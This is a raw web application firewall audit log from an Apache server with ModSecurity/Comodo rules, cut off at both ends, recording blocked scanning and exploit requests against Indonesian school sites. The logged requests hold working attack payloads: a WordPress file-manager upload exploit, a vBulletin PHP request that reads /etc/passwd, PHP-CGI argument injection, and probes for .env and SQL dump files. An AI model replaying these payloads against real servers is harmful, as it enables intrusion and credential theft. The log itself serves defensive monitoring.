java.lang.reflect.field field = adapter.getclass().getdeclaredfield(connectionhandler) field.setaccessible(true) object obj = field.get(adapter) weblogic.servlet.internal.servletrequestimpl req =(weblogic.servlet.internal.servletrequestimpl) obj.getclas..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748944711040763 7431 (- - -) Stopwatch2: 1748944711040763 7431; combined=6133, p1=344, p2=5501, p3=0, p4=0, p5=287, sr=59, sw=1, l=0, gc=0 
Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32f0fa77-Z-- --a5c7a55c-A-- [03/Jun/2025:16:58:31 +0700] aD7HR5AN5Lj366RdGMxr6AAAAM0 103.236.140.4 53372 103.236.140.4 8181 --a5c7a55c-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 608 User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171568705 --a5c7a55c-C-- --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" 17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd" upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target" l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]" 1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain poc-test --------------------------ca81ac1fececda48-- --a5c7a55c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5c7a55c-E-- --a5c7a55c-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. 
[file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748944711686170 3908 (- - -) Stopwatch2: 1748944711686170 3908; combined=2710, p1=433, p2=2238, p3=0, p4=0, p5=39, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5c7a55c-Z-- --7d73b01e-A-- [03/Jun/2025:16:58:31 +0700] aD7HR0SujXvW2xVCZlV9HQAAAAs 103.236.140.4 53368 103.236.140.4 8181 --7d73b01e-B-- POST /mifs/.;/services/LogService HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 6 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0 Content-Type: x-application/hessian X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 172436840 --7d73b01e-C-- cH --7d73b01e-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d73b01e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=x-application/hessian"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748944711685388 15226 (- - -) Stopwatch2: 1748944711685388 15226; combined=7901, p1=2576, p2=5254, p3=22, p4=24, p5=25, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d73b01e-Z-- --2b53c922-A-- [03/Jun/2025:16:58:32 +0700] aD7HSJAN5Lj366RdGMxr7gAAAM8 103.236.140.4 53490 103.236.140.4 8181 --2b53c922-B-- POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 140 User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 172415087 --2b53c922-C-- subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" --2b53c922-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b53c922-E-- --2b53c922-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ajax/render/widget_tabbedcontainer_tab_panel"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748944712679546 2438 (- - -) Stopwatch2: 1748944712679546 2438; combined=775, p1=489, p2=256, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b53c922-Z-- --03b8bb78-A-- [03/Jun/2025:17:26:24 +0700] aD7N0ESujXvW2xVCZlWftwAAABQ 103.236.140.4 41666 103.236.140.4 8181 --03b8bb78-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 206.81.12.187 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 206.81.12.187 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --03b8bb78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03b8bb78-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748946384478903 793 (- - -) Stopwatch2: 1748946384478903 793; combined=319, p1=281, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03b8bb78-Z-- --9efc8a28-A-- [03/Jun/2025:18:32:08 +0700] aD7dOJAN5Lj366RdGMzKCwAAAM0 103.236.140.4 34002 103.236.140.4 8181 --9efc8a28-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --9efc8a28-C-- --9efc8a28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9efc8a28-E-- --9efc8a28-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748950328117093 4339 (- - -) Stopwatch2: 1748950328117093 4339; combined=2926, p1=550, p2=2344, p3=0, p4=0, p5=32, sr=61, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9efc8a28-Z-- --ecafb32f-A-- [03/Jun/2025:18:36:12 +0700] aD7eLJAN5Lj366RdGMzN9AAAANA 103.236.140.4 49496 103.236.140.4 8181 --ecafb32f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; sdk Build/MR1) AppleWebKit/536.23 (KHTML, like Gecko) Version/4.3 Mobile Safari/536.23 Accept-Charset: utf-8 --ecafb32f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecafb32f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748950572804793 769 (- - -) Stopwatch2: 1748950572804793 769; combined=299, p1=261, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecafb32f-Z-- --154deb3a-A-- [03/Jun/2025:18:36:19 +0700] aD7eM0SujXvW2xVCZlXk5QAAABQ 103.236.140.4 49930 103.236.140.4 8181 --154deb3a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116 Accept-Charset: utf-8 --154deb3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --154deb3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748950579825793 1000 (- - -) Stopwatch2: 1748950579825793 1000; combined=380, p1=340, p2=0, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --154deb3a-Z-- --6cf84819-A-- [03/Jun/2025:18:39:07 +0700] aD7e240G58RZMmoh8H0BeQAAAIc 103.236.140.4 60148 103.236.140.4 8181 --6cf84819-B-- GET /.c9/metadata/environment/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8 Accept-Charset: utf-8 --6cf84819-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cf84819-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748950747644980 930 (- - -) Stopwatch2: 1748950747644980 930; combined=430, p1=387, p2=0, p3=0, p4=0, p5=43, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6cf84819-Z-- --a86dc46b-A-- [03/Jun/2025:18:40:32 +0700] aD7fMESujXvW2xVCZlXoQgAAAAo 103.236.140.4 37024 103.236.140.4 8181 --a86dc46b-B-- GET /storage/logs/laravel.log HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1 Accept-Charset: utf-8 --a86dc46b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a86dc46b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748950832167503 2241 (- - -) Stopwatch2: 1748950832167503 2241; combined=833, p1=358, p2=450, p3=0, p4=0, p5=24, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a86dc46b-Z-- --d885463d-A-- [03/Jun/2025:19:21:15 +0700] aD7ouwhM7ynDNybXsoPRgAAAAEA 103.236.140.4 46258 103.236.140.4 8181 --d885463d-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 206.189.19.19 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 206.189.19.19 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d885463d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d885463d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748953275957936 799 (- - -) Stopwatch2: 1748953275957936 799; combined=343, p1=304, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d885463d-Z-- --5fd4512e-A-- [03/Jun/2025:20:24:30 +0700] aD73jo0G58RZMmoh8H0omwAAAI4 103.236.140.4 38380 103.236.140.4 8181 --5fd4512e-B-- GET /prod.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.90.185.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.90.185.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --5fd4512e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fd4512e-H-- Message: Access denied with code 403 (phase 2). 
Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957070590176 2658 (- - -) Stopwatch2: 1748957070590176 2658; combined=953, p1=425, p2=495, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fd4512e-Z-- --e35edb05-A-- [03/Jun/2025:20:24:31 +0700] aD73jwhM7ynDNybXsoPiugAAAEo 103.236.140.4 38394 103.236.140.4 8181 --e35edb05-B-- GET /wordpress_f.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.90.185.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.90.185.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --e35edb05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e35edb05-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957071550573 2646 (- - -) Stopwatch2: 1748957071550573 2646; combined=925, p1=412, p2=482, p3=0, p4=0, p5=31, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e35edb05-Z-- --0a922c13-A-- [03/Jun/2025:20:24:32 +0700] aD73kAhM7ynDNybXsoPiuwAAAEg 103.236.140.4 38408 103.236.140.4 8181 --0a922c13-B-- GET /wordpress_.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.90.185.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.90.185.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --0a922c13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a922c13-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957072555019 2939 (- - -) Stopwatch2: 1748957072555019 2939; combined=1011, p1=520, p2=459, p3=0, p4=0, p5=32, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a922c13-Z-- --22c24b4c-A-- [03/Jun/2025:20:24:33 +0700] aD73kZAN5Lj366RdGMz9aQAAAM8 103.236.140.4 38426 103.236.140.4 8181 --22c24b4c-B-- GET /main_wordpress.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.100.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.100.253 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --22c24b4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22c24b4c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957073816342 3715 (- - -) Stopwatch2: 1748957073816342 3715; combined=1636, p1=704, p2=898, p3=0, p4=0, p5=34, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22c24b4c-Z-- --107d332b-A-- [03/Jun/2025:20:24:35 +0700] aD73k0SujXvW2xVCZlUPFAAAAAg 103.236.140.4 38448 103.236.140.4 8181 --107d332b-B-- GET /WP.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.100.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.100.253 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --107d332b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --107d332b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957075422822 2609 (- - -) Stopwatch2: 1748957075422822 2609; combined=962, p1=477, p2=457, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --107d332b-Z-- --b8eeeb5f-A-- [03/Jun/2025:20:24:37 +0700] aD73lZAN5Lj366RdGMz9agAAAMA 103.236.140.4 38470 103.236.140.4 8181 --b8eeeb5f-B-- GET /unnamed-file.wp.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.100.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.100.253 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --b8eeeb5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8eeeb5f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".wp.sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957077065386 3770 (- - -) Stopwatch2: 1748957077065386 3770; combined=934, p1=435, p2=470, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8eeeb5f-Z-- --43d0b25c-A-- [03/Jun/2025:20:24:39 +0700] aD73lwhM7ynDNybXsoPivQAAAFI 103.236.140.4 38504 103.236.140.4 8181 --43d0b25c-B-- GET /usr.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.100.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.100.253 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --43d0b25c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43d0b25c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
